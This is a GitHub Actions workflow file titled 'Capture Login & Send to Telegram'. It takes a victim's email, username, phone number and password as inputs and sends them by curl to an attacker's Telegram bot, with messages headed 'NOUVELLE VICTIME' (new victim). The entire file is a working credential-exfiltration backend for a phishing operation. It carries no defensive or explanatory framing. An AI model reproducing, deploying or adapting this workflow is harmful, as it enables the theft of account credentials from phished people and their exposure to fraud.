name: Capture Login & Send to Telegram

on:
  workflow_dispatch:
    inputs:
      email:
        required: true
      username:
        required: true
      phone:
        required: false
        default: "None"
      password:
        required: true

jobs:
  send:
    runs-on: ubuntu-latest
    steps:
      - name: Send to Telegram
        run: |
          curl -s -X POST https://api.telegram.org/bot${{ secrets.BOT_TOKEN }}/sendMessage \
            -d chat_id=${{ secrets.CHAT_ID }} \
            -d parse_mode=HTML \
            -d text="<b>NOUVELLE VICTIME</b>%0AEmail: <code>${{ github.event.inputs.email }}</code>%0AUsername: <code>${{ github.event.inputs.username }}</code>%0APhone: <code>${{ github.event.inputs.phone }}</code>%0APassword: <code>${{ github.event.inputs.password }}</code>%0ATime: $(date +'%Y-%m-%d %H:%M:%S UTC')"
